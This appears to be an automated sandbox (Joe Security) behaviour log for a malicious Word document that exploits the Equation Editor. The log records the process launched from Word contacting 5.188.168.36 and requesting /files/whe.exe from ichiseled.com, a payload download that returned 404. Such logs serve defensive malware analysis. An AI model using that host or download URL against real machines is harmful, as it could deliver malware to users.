Source: Network Connection | Author: Joe Security: Data: DestinationIp: 5.188.168.36, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: unknown |
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding |
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: global traffic | DNS query: name: ichiseled.com |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 5.188.168.36:80 |
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 5.188.168.36:80 |
Source: Joe Sandbox View | ASN Name: GHOSTRU GHOSTRU |
Source: global traffic | HTTP traffic detected: GET /files/whe.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ichiseled.comConnection: Keep-Alive |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A8E8FD7-B28F-4AE5-86AD-026C320EA73C}.tmp | Jump to behavior |
Source: global traffic | HTTP traffic detected: GET /files/whe.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ichiseled.comConnection: Keep-Alive |
Source: unknown | DNS traffic detected: queries for: ichiseled.com |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 06:45:03 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>3404 |
Source: classification engine | Classification label: mal60.expl.winDOC@4/6@1/1 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding |
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding |
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1748 | Thread sleep time: -120000s >= -30000s |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2824 | Thread sleep time: -120000s >= -30000s |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.